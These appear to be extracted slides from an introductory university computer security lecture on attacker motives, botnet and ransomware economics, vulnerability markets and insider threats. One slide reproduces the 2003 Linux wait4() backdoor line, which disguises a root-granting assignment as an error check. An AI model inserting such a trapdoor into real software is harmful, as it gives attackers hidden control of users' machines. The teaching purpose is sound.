https://crypto.stanford.

edu/cs155

CS155

Computer Security

Course overview
Dan Boneh
 The computer security problem
• Lots of buggy software
• Social engineering is very effective

• Money can be made from finding and exploiting vulns.

1. Marketplace for vulnerabilities

2. Marketplace for owned machines (PPI)

3. Many methods to profit from owned machines

current state of computer security Dan Boneh
 Lots of vulnerability disclosures (2015)

source: www.cvedetails.com/top-50-products.php?year=2016 Dan Boneh

Vulnerable applications being exploited

Source: Kaspersky Security Bulletin 2015 Dan Boneh

 Mobile malware (Nov. 2013 – Oct. 2014)

date

The rise of mobile banking Trojans (Kaspersky Security Bulletin 2014)

Dan Boneh
Introduction

Sample attacks

Dan Boneh
Why own client machines:
1. IP address and bandwidth stealing
Attacker’s goal: look like a random Internet user

Use the IP address of infected machine or phone for:

• Spam (e.g. the storm botnet)
Spamalytics: 1:12M pharma spams leads to purchase
1:260K greeting card spams leads to infection

• Denial of Service: Services: 1 hour (20$), 24 hours (100$)

• Click fraud (e.g. Clickbot.a)
Dan Boneh
Why own machines:
2. Steal user credentials and inject ads
keylog for banking passwords, web passwords, gaming pwds.
Example: SilentBanker (and many like it)

User requests login page

Malware injects Bank sends login page

Javascript needed to log in
Bank
When user submits
information, also sent to
attacker Similar mechanism used
by Zeus botnet
Man-in-the-Browser (MITB)
Dan Boneh
 Lots of financial malware

• size: 3.5 KB
• spread via email
attachments
• also found on home routers

Source: Kaspersky Security Bulletin 2015 Dan Boneh

 Users attacked: stats

≈ 300,000 users/month worldwide A worldwide problem

Source: Kaspersky Security Bulletin 2015 Dan Boneh

Why own machines: 3. Ransomware

CryptoWall (2014-)
• targets Windows
• spread by spam emails

≈ 200,000 machines in 2015

A worldwide problem.

Dan Boneh
 Why own machines:
4. Spread to isolated systems
Example: Stuxtnet

Windows infection ⇒
Siemens PCS 7 SCADA control software on Windows ⇒
Siemens device controller on isolated network

More on this later in course

Dan Boneh
 Server-side attacks
• Financial data theft: often credit card numbers
– Example: Target attack (2013), ≈ 140M CC numbers stolen
– Many similar (smaller) attacks since 2000

• Political motivation:
– DNC, Tunisia Facebook (Feb. 2011), GitHub (Mar. 2015)

• Infect visiting users

Dan Boneh
 Types of data stolen (2012-2015)

Source: California breach notification report, 2015 Dan Boneh

 Example: Mpack
• PHP-based tools installed on compromised web sites
– Embedded as an iframe on infected page
– Infects browsers that visit site
• Features
– management console provides stats on infection rates
– Sold for several 100$
– Customer care can be purchased, one-year support contract
• Impact: 500,000 infected sites (compromised via SQL injection)
– Several defenses: e.g. Google safe browsing
Dan Boneh
 Insider attacks: example
Hidden trap door in Linux (nov 2003)
– Allows attacker to take over a computer
– Practically undetectable change (uncovered via CVS logs)

Inserted line in wait4()

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Looks like a standard error check, but …

See: http://lwn.net/Articles/57135/ Dan Boneh
 Many more examples
• Access to SIPRnet and a CD-RW: 260,000 cables ⇒ Wikileaks

• SysAdmin for city of SF government.

Changed passwords, locking out city from router access

• Inside logic bomb took down 2000 UBS servers

⋮
Can security technology help?
Dan Boneh
 How companies lose data
insider error
lost/stolen laptops
insider attack

How do we have this data?

malware/phishing

Source: California breach notification report, 2015 Dan Boneh

 Introduction

The Marketplace for

Vulnerabilities

Dan Boneh
 Marketplace for Vulnerabilities
Option 1: bug bounty programs (many)
• Google Vulnerability Reward Program: up to $31,337
• Microsoft Bounty Program: up to $100K
• Apple Bug Bounty program: up to $200K (secure boot firmware)
• Pwn2Own competition: $15K

Option 2:
• Zero day initiative (ZDI), iDefense (accenture): up to $25K
• Zerodium: $1.5M for iOS10, $200K for Android 7 (Sep. 2016)
Dan Boneh
Example: Mozilla

Dan Boneh
 Marketplace for Vulnerabilities
Option 3: black market

… and even up to $1.5M

Source: Andy Greenberg (Forbes, 3/23/2012 ) Dan Boneh

 Marketplace for owned machines
clients spam
keylogger
bot
Pay-per-install (PPI) services

PPI operation:
PPI service
1. Own victim’s machine
2. Download and install client’s code
3. Charge client

Victims
Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf) Dan Boneh
 Marketplace for owned machines
clients spam
keylogger
bot

Cost: US - 100-180$ / 1000 machines

PPI service
Asia - 7-8$ / 1000 machines

Victims
Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf) Dan Boneh
 This course
Goals:

• Be aware of exploit techniques

• Learn to defend and avoid common exploits

• Learn to architect secure systems

Dan Boneh
 This course
Part 1: basics (architecting for security)
• Securing apps, OS, and legacy code
Isolation, authentication, and access control
Part 2: Web security (defending against a web attacker)
• Building robust web sites, understand the browser security model
Part 3: network security (defending against a network attacker)
• Monitoring and architecting secure networks.
Part 4: securing mobile applications
Dan Boneh
Don’t try this at home !

Dan Boneh
Ken Thompson’s clever Trojan

Dan Boneh